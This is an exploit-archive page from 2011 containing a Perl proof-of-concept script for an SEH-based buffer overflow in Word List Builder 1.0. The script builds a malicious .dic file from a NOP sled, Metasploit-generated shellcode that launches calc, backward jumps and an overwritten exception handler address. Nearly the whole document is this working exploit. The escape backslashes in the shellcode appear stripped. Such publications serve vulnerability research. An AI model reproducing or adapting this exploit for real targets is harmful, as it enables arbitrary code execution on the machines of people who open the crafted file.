Home / exploits Word List Builder 1.0 Buffer Overflow
Posted on 03 April 2011
# Exploit Title: Word List Builder Buffer Overflow Exploit(SEH) # Software Link: http://download.cnet.com/Word-List-Builder/3000-18541_4-10398336.html # Version: 1.0 # triggering details : open .dic file # Tested on: Win XP SP3 French # Date: 31/03/2011 # Author: h1ch4m (Hicham Oumounid) # Email: h1ch4m@live.fr # Home: http://net-effects.blogspot.com my $file = "exploit.dic"; my $size = 4108; # windows/exec - 223 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=seh, CMD=calc my $shellcode = "xdaxddxbfxb0x1ax64x4fxd9x74x24xf4x58x31xc9" . "xb1x32x31x78x17x83xc0x04x03xc8x09x86xbaxd4" . "xc6xcfx45x24x17xb0xccxc1x26xe2xabx82x1bx32" . "xbfxc6x97xb9xedxf2x2cxcfx39xf5x85x7ax1cx38" . "x15x4bxa0x96xd5xcdx5cxe4x09x2ex5cx27x5cx2f" . "x99x55xafx7dx72x12x02x92xf7x66x9fx93xd7xed" . "x9fxebx52x31x6bx46x5cx61xc4xddx16x99x6exb9" . "x86x98xa3xd9xfbxd3xc8x2ax8fxe2x18x63x70xd5" . "x64x28x4fxdax68x30x97xdcx92x47xe3x1fx2ex50" . "x30x62xf4xd5xa5xc4x7fx4dx0exf5xacx08xc5xf9" . "x19x5ex81x1dx9fxb3xb9x19x14x32x6exa8x6ex11" . "xaaxf1x35x38xebx5fx9bx45xebx07x44xe0x67xa5" . "x91x92x25xa3x64x16x50x8ax67x28x5bxbcx0fx19" . "xd0x53x57xa6x33x10xa9x57x8ex8cx3excex7bxed" . "x22xf1x51x31x5bx72x50xc9x98x6ax11xccxe5x2c" . "xc9xbcx76xd9xedx13x76xc8x8dxf2xe4x90x51"; my $jump = "xe9x1cxffxffxff"; # jump back 228 bytes my $nseh = "xebxf9xffxff"; # jump back 7 bytes my $seh = pack('V', 0x00402AAF); # pop eax - pop edx - ret [word_builder.exe] my $junk = "x90" x ($size-length($shellcode.$jump)); open($FILE,">$file"); print $FILE $junk.$shellcode.$jump.$nseh.$seh; close($FILE); print "Files Created successfully "; sleep(1);
